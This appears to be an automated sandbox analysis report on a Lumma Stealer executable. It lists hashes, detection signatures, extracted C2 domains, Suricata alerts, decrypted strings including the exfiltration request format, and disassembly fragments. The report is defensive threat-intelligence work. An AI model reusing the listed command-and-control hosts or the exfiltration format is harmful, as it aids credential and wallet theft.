

Windows Analysis Report
3zg6i6Zu1u.exe

Overview

General Information

Sample name: 3zg6i6Zu1u.exe (renamed because original name is a hash value)
Original sample name: 996aa4b544e08689f305d751c60835c7.exe
Analysis ID: 1580303
MD5: 996aa4b544e08689f305d751c60835c7
SHA1: 5792471be8a25d8472a84fa3967f241f776b5cba
SHA256: 5f20a76b1d382a5817af09d9c0307fbaeeae34a3e6b714e0eded2bca695bdd94
Tags: exe, LummaStealer, user-abuse_ch

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
LummaC encrypted strings found
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Sample uses string decryption to hide its real strings
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • 3zg6i6Zu1u.exe (PID: 1564 cmdline: "C:\Users\user\Desktop\3zg6i6Zu1u.exe" MD5: 996AA4B544E08689F305D751C60835C7)
    • WerFault.exe (PID: 5160 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1564 -s 1784 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["diffuculttan.xyz", "awake-weaves.cyou", "deafeninggeh.biz", "wrathful-jammy.cyou", "spellshagey.biz", "effecterectz.xyz", "debonairnukk.xyz", "sordid-snaked.cyou", "immureprech.biz"], "Build id": "HpOoIh--2a727a032c4d"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |
00000000.00000002.1665368901.00000000009A9000.00000040.00000020.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown | 0xc30:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Smokeloader_3687686f | unknown | unknown | 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
decrypted.memstr | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |

No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-24T09:05:09.648432+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49705 | 23.55.153.106 | 443 | TCP
2024-12-24T09:05:12.050993+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49706 | 172.67.157.254 | 443 | TCP
2024-12-24T09:05:13.830658+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49707 | 172.67.157.254 | 443 | TCP
2024-12-24T09:05:12.811595+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.8 | 49706 | 172.67.157.254 | 443 | TCP
2024-12-24T09:05:12.811595+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.8 | 49706 | 172.67.157.254 | 443 | TCP
2024-12-24T09:05:07.471701+0100 | 2058210 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 57941 | 1.1.1.1 | 53 | UDP
2024-12-24T09:05:06.250945+0100 | 2058214 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 64708 | 1.1.1.1 | 53 | UDP
2024-12-24T09:05:07.012101+0100 | 2058216 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 57769 | 1.1.1.1 | 53 | UDP
2024-12-24T09:05:06.702284+0100 | 2058218 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 58192 | 1.1.1.1 | 53 | UDP
2024-12-24T09:05:06.482372+0100 | 2058220 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 56885 | 1.1.1.1 | 53 | UDP
2024-12-24T09:05:06.013971+0100 | 2058222 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 49713 | 1.1.1.1 | 53 | UDP
2024-12-24T09:05:07.795281+0100 | 2058226 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 65146 | 1.1.1.1 | 53 | UDP
2024-12-24T09:05:05.853014+0100 | 2058285 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 53100 | 1.1.1.1 | 53 | UDP
2024-12-24T09:05:07.237760+0100 | 2058236 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 63066 | 1.1.1.1 | 53 | UDP
2024-12-24T09:05:10.476631+0100 | 2858666 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 49705 | 23.55.153.106 | 443 | TCP


AV Detection

Source: 3zg6i6Zu1u.exe | Avira: detected
Source: https://lev-tolstoi.com/w | Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/piGI | Avira URL Cloud: Label: malware
Source: spellshagey.biz | Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/7g | Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/apia | Avira URL Cloud: Label: malware
Source: 0.2.3zg6i6Zu1u.exe.400000.0.raw.unpack | Malware Configuration Extractor: LummaC {"C2 url": ["diffuculttan.xyz", "awake-weaves.cyou", "deafeninggeh.biz", "wrathful-jammy.cyou", "spellshagey.biz", "effecterectz.xyz", "debonairnukk.xyz", "sordid-snaked.cyou", "immureprech.biz"], "Build id": "HpOoIh--2a727a032c4d"}
Source: 3zg6i6Zu1u.exe | Virustotal: Detection: 73%
Source: 3zg6i6Zu1u.exe | ReversingLabs: Detection: 78%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.5% probability
Source: 3zg6i6Zu1u.exe | Joe Sandbox ML: detected
Source: 00000000.00000003.1440479074.00000000024C0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: sordid-snaked.cyou
Source: 00000000.00000003.1440479074.00000000024C0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: awake-weaves.cyou
Source: 00000000.00000003.1440479074.00000000024C0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: wrathful-jammy.cyou
Source: 00000000.00000003.1440479074.00000000024C0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: debonairnukk.xyz
Source: 00000000.00000003.1440479074.00000000024C0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: diffuculttan.xyz
Source: 00000000.00000003.1440479074.00000000024C0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: effecterectz.xyz
Source: 00000000.00000003.1440479074.00000000024C0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: deafeninggeh.biz
Source: 00000000.00000003.1440479074.00000000024C0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: immureprech.biz
Source: 00000000.00000003.1440479074.00000000024C0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: spellshagey.biz
Source: 00000000.00000003.1440479074.00000000024C0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000003.1440479074.00000000024C0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000000.00000003.1440479074.00000000024C0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: - Screen Resoluton:
Source: 00000000.00000003.1440479074.00000000024C0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000000.00000003.1440479074.00000000024C0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: Workgroup: -
Source: 00000000.00000003.1440479074.00000000024C0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: HpOoIh--2a727a032c4d

Compliance

Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Unpacked PE file: 0.2.3zg6i6Zu1u.exe.400000.0.unpack
Source: 3zg6i6Zu1u.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown | HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then jmp ecx | 0_2_0043CA12
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then movzx eax, byte ptr [esp+edx+50h] | 0_2_00437BC0
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then movzx edx, byte ptr [esp+ecx+2D1F4786h] | 0_2_0043D010
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then mov ecx, eax | 0_2_0042A0E0
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then mov byte ptr [esi], al | 0_2_0041C08C
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then mov edi, edx | 0_2_00409150
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then mov byte ptr [esi], al | 0_2_00409150
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then mov byte ptr [esi], al | 0_2_00409150
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then mov ebx, eax | 0_2_00405950
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then mov ebp, eax | 0_2_00405950
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], B430E561h | 0_2_00414170
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+ebp+02h] | 0_2_00429170
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], 7A5C62DDh | 0_2_00418176
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then lea edi, dword ptr [esi+esi] | 0_2_0040D120
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then movzx edi, word ptr [ecx] | 0_2_0041912E
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then movzx eax, byte ptr [esp+esi+5D0CB002h] | 0_2_0041912E
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then movzx ebx, byte ptr [edx] | 0_2_004349C0
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then jmp ecx | 0_2_0043C9DB
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then mov word ptr [eax], cx | 0_2_004189F5
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then add ebp, dword ptr [esp+0Ch] | 0_2_0042B980
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then movzx ebx, byte ptr [eax+edx-61DE2F8Fh] | 0_2_0043D980
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then movzx edx, byte ptr [eax+ecx-61DE2F8Fh] | 0_2_0043D980
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then movzx edi, byte ptr [esp+eax-47h] | 0_2_0041D200
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then mov ebx, ecx | 0_2_00423A1C
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then movzx ebx, byte ptr [esp+eax+0984A1C9h] | 0_2_00417A28
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then lea edx, dword ptr [ecx-5D3369E7h] | 0_2_00409AC1
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then movzx esi, byte ptr [ebp+eax+0CC5C7CCh] | 0_2_00409AC1
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then mov byte ptr [edi], cl | 0_2_0042C2CF
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], 7A5C62DDh | 0_2_00418176
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then movzx ebx, byte ptr [eax+edx-61DE2F8Fh] | 0_2_0043DA80
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then movzx edx, byte ptr [eax+ecx-61DE2F8Fh] | 0_2_0043DA80
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then jmp ecx | 0_2_0043CA9D
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then mov ecx, ebx | 0_2_0043CB51
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h | 0_2_0043EB50
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then mov byte ptr [edi], al | 0_2_0041BB5A
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then movzx ebx, byte ptr [esp+eax+00000098h] | 0_2_0042DB7F
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then movzx ebx, byte ptr [eax+edx-61DE2F8Fh] | 0_2_0043DBF0
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then movzx edx, byte ptr [eax+ecx-61DE2F8Fh] | 0_2_0043DBF0
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then mov word ptr [eax], cx | 0_2_004223A0
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then cmp dword ptr [edi+ecx*8], A269EEEFh | 0_2_004383A0
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then movzx ebx, byte ptr [ecx+edx] | 0_2_0040A3AA
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then movsx esi, byte ptr [ebp+ecx+00h] | 0_2_0043D450
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then movzx ebx, byte ptr [esp+eax+00000098h] | 0_2_0042DB7A
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h | 0_2_0042B4D0
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], B430E561h | 0_2_004144D5
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then movzx ebx, byte ptr [eax+edx-61DE2F8Fh] | 0_2_0043DC80
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then movzx edx, byte ptr [eax+ecx-61DE2F8Fh] | 0_2_0043DC80
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then mov ecx, edi | 0_2_004074A0
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then movzx edi, byte ptr [esp+edx-1700BF35h] | 0_2_0041C4A1
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], B430E561h | 0_2_004144A5
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then jmp dword ptr [004446A8h] | 0_2_00416D51
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then movzx ebx, byte ptr [eax+edx-61DE2F8Fh] | 0_2_0043DD00
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then movzx edx, byte ptr [eax+ecx-61DE2F8Fh] | 0_2_0043DD00
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then movzx edi, byte ptr [esp+ecx+20h] | 0_2_0042A5CF
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then movzx eax, byte ptr [esp+edx+38h] | 0_2_0041C661
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then movzx esi, byte ptr [esp+eax-0CD1ACF4h] | 0_2_00438630
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then mov eax, dword ptr [esp] | 0_2_00438630
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then mov word ptr [ecx], bp | 0_2_0041D6C2
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then mov word ptr [ecx], bp | 0_2_0041D6D9
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then mov byte ptr [edi], bl | 0_2_00408EF0
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then mov ecx, eax | 0_2_00422F0D
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then jmp dword ptr [00444700h] | 0_2_00416F11
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then mov ebx, dword ptr [edi+04h] | 0_2_0042AF10
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then movzx eax, word ptr [ebx+ecx] | 0_2_004227B0
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax-2B30990Bh] | 0_2_004227B0
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then movzx ebp, byte ptr [esp+esi+02h] | 0_2_004227B0
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], B430E561h | 0_2_004227B0
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then mov ebx, ecx | 0_2_02493A76
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then movzx eax, word ptr [ebx+ecx] | 0_2_02492A17
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax-2B30990Bh] | 0_2_02492A17
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then movzx ebp, byte ptr [esp+esi+02h] | 0_2_02492A17
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], B430E561h | 0_2_02492A17
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then mov byte ptr [esi], al | 0_2_0248C2F3
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then mov ecx, eax | 0_2_0249A347
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], B430E561h | 0_2_02484BCD
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], 7A5C62DDh | 0_2_024883DD
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+ebp+02h] | 0_2_024993D7
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then add ebp, dword ptr [esp+0Ch] | 0_2_0249BBE7
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then lea edi, dword ptr [esi+esi] | 0_2_0247D387
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then mov eax, dword ptr [esp+0000008Ch] | 0_2_02486B91
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then movzx edi, word ptr [ecx] | 0_2_02489395
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then movzx eax, byte ptr [esp+esi+5D0CB002h] | 0_2_02489395
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then mov edi, edx | 0_2_024793B7
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then mov byte ptr [esi], al | 0_2_024793B7
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then mov byte ptr [esi], al | 0_2_024793B7
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then mov ebx, eax | 0_2_02475BB7
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then mov ebp, eax | 0_2_02475BB7
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then movzx edi, byte ptr [esp+ecx+20h] | 0_2_0249A836
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then movzx eax, byte ptr [esp+edx+38h] | 0_2_0248C8C8
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then movzx esi, byte ptr [esp+eax-0CD1ACF4h] | 0_2_024A8897
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then mov eax, dword ptr [esp] | 0_2_024A8897
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then mov word ptr [ecx], bp | 0_2_0248D94F
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then mov byte ptr [edi], bl | 0_2_02479157
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then jmp dword ptr [00444700h] | 0_2_02487178
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then mov ebx, dword ptr [edi+04h] | 0_2_0249B177
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then mov ecx, eax | 0_2_0249318B
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then mov word ptr [eax], cx | 0_2_02492607
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then movzx ebx, byte ptr [ecx+edx] | 0_2_0247A611
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then movzx eax, byte ptr [esp+edx+50h] | 0_2_024A7E27
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then cmp dword ptr [edi+ecx*8], A269EEEFh | 0_2_024A863B
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then movzx ebx, byte ptr [esp+eax+00000098h] | 0_2_0249DDE1
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then mov ecx, edi | 0_2_02477707
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then movzx edi, byte ptr [esp+edx-1700BF35h] | 0_2_0248C708
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h | 0_2_0249B737
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then jmp dword ptr [004446A8h] | 0_2_02486FB8
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then mov word ptr [eax], cx | 0_2_02488C5C
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then movzx edi, byte ptr [esp+eax-47h] | 0_2_0248D467
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then movzx ebx, byte ptr [edx] | 0_2_024A4C27
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then movzx ebx, byte ptr [esp+eax+0984A1C9h] | 0_2_02487C83
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then lea edx, dword ptr [ecx-5D3369E7h] | 0_2_02479D28
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then movzx esi, byte ptr [ebp+eax+0CC5C7CCh] | 0_2_02479D28
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then mov byte ptr [edi], cl | 0_2_0249C536
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then mov byte ptr [edi], al | 0_2_0248BDC1
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then movzx ebx, byte ptr [esp+eax+00000098h] | 0_2_0249DDE6
Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe | Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h | 0_2_024AEDB7

      Networking

      barindex
      Source: Network trafficSuricata IDS: 2058222 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz) : 192.168.2.8:49713 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2058226 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou) : 192.168.2.8:65146 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2058218 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz) : 192.168.2.8:58192 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2058214 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz) : 192.168.2.8:64708 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2058236 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou) : 192.168.2.8:63066 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2058285 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spellshagey .biz) : 192.168.2.8:53100 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2058220 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz) : 192.168.2.8:56885 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2058216 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz) : 192.168.2.8:57769 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2058210 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou) : 192.168.2.8:57941 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.8:49705 -> 23.55.153.106:443
      Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49706 -> 172.67.157.254:443
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49706 -> 172.67.157.254:443
      Source: Malware configuration extractorURLs: diffuculttan.xyz
      Source: Malware configuration extractorURLs: awake-weaves.cyou
      Source: Malware configuration extractorURLs: deafeninggeh.biz
      Source: Malware configuration extractorURLs: wrathful-jammy.cyou
      Source: Malware configuration extractorURLs: spellshagey.biz
      Source: Malware configuration extractorURLs: effecterectz.xyz
      Source: Malware configuration extractorURLs: debonairnukk.xyz
      Source: Malware configuration extractorURLs: sordid-snaked.cyou
      Source: Malware configuration extractorURLs: immureprech.biz
      Source: DNS query: effecterectz.xyz
      Source: DNS query: diffuculttan.xyz
      Source: DNS query: debonairnukk.xyz
      Source: Joe Sandbox ViewIP Address: 172.67.157.254 172.67.157.254
      Source: Joe Sandbox ViewIP Address: 23.55.153.106 23.55.153.106
      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49705 -> 23.55.153.106:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49707 -> 172.67.157.254:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49706 -> 172.67.157.254:443
